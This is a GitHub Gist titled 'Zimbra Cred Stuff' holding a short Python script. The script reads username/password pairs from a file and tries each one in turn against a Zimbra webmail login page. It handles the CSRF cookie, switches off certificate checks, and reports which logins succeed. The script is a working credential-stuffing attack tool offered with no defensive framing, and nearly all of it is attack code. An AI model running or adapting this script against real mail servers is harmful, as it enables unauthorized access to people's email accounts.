Created
December 7, 2018 23:07
-
-
Save marcosValle/2ffbc101c859f8c77a6e7dbbd25ed1e8 to your computer and use it in GitHub Desktop.
Zimbra Cred Stuff
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from termcolor import colored | |
import sys | |
import requests | |
import urllib3 | |
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
#creds.txt in this format: | |
#mylogin 12345 | |
#otherlogin 54321 | |
#... | |
def readCreds(fpath): | |
d = {} | |
with open(fpath, "r") as f: | |
for line in f: | |
(key, val) = line.split() | |
d[key] = val | |
return d | |
URL = 'https://correo.mydomain.com' | |
d = readCreds("creds.txt") | |
for username, password in d.items(): | |
print(colored("[+] Trying login > {}:{}".format(username, password), "blue")) | |
client = requests.session() | |
client.get(URL, verify=False) | |
if 'ZM_LOGIN_CSRF' in client.cookies: | |
csrftoken = client.cookies['ZM_LOGIN_CSRF'] | |
login_data = dict(loginOp="login", login_csrf=csrftoken, username=username, password=password, client="preferred") | |
r = client.post(URL, data=login_data, headers=dict(Referer=URL), verify=False) | |
if(b"The username or password is incorrect" not in r.content): | |
print(colored("[+] ACCESS GRANTED", "green")) | |
else: | |
print(colored("[-] ACCESS DENIED", "red")) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment